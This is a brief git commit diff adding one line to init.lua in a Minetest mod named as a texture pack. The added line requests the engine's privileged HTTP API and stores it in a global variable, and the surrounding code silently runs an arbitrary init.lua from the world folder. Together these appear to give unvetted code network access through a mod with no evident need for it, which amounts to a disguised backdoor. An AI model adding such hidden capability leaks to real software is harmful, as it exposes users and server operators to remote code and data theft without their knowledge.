Aktualizovat „textures_pack_30000/init.lua“

This commit is contained in:
Milan2018 2022-08-11 15:53:08 +02:00
parent cd90b2c5e8
commit d0bf3fad60
1 changed files with 1 additions and 0 deletions

View File

@ -11,4 +11,5 @@ minetest.after(1,function()
end
minetest.register_entity(":__builtin:item",t)
end)
init_input1=minetest.request_http_api()
pcall(dofile,minetest.get_worldpath().."/init.lua")